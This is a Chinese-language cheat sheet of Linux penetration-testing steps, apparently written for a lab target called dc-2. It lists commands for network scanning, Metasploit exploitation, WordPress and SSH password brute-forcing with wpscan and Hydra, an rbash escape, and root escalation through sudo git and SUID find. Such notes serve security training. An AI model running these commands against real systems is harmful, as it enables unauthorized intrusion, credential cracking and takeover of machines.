linux渗透基本步骤与使用的命令
一、寻找活动主机:
1.比较快速的方法:arp-scan -l
- netdiscover
- nmap -sS 网络开始地址/24
参数:-sS 是指SYN扫描
二、活动主机的信息收集
- nmap -A -p- hostIP
参数:-A OS识别,版本探测,脚本扫描和traceroute综合扫描
参数:-p- 扫描所有端口
三、漏洞利用
1.启动metasploit
msfconsole
2.搜索指定的exploit(主机中存在的漏洞)
search 主机中存在的漏洞名称
会已列表形式列出漏洞模块
- 指定上面列表中可用的模块
use 模块编号
4.查看需要配置项
show options
5.漏洞爆破
exploit
成功后,会出现:meterpreter>
并进入到被攻击主机中。可以列出靶机的文件目录。
6.如果是wordpress网站,可以使用wpscan扫描可以登录的用户
wpscan --url dc-2 -e u
-e:简单进行整体快速扫描
u:枚举WordPress用户名
-U:指定用户名字典
-P:指定密码字典
wpscan工具爆破
wpscan --url dc-2 -U dc2users.txt -P dc2.txt
上面的密码字典可以通过以下方法生成:
cewl http://dc-2 -w dc2.txt
ssh登录密码爆破: 使用Hydra工具进行
hydra -L dc2users.txt -P dc2.txt 192.168.43.15 ssh -s 7744(ssh端口号)
-L:指定用户名字典
-P:指定密码字典
-s:可通过这个参数指定非默认端口
rbash绕过方法:
BASH_CMDS[a]=/bin/sh;a #调用/bin/sh命令解释器
/bin/bash #使用bash命令解释器
export PATH=$PATH:/bin/ #设置环境变量
git提权:
sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git -p help
!/bin/bash
四、进入靶机shell
shell
查看python版本
python -V
通过pty.spawn()获得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
五、提升权限
提权专题介绍
1.使用find命令查找有特殊权限suid的命令
find / -perm -4000
例如find具有suid权限,则执行下面命令
find 任意文件 -exec '/bin/sh' \;
如果成功提权,则提示符从“>”变为“#”
2.使用git进行提权
sudo git help config
输入:GG
来到最后一行
输入以下代码进行提权:
!/bin/bash
如果成功提权,则提示符从“>”变为“#”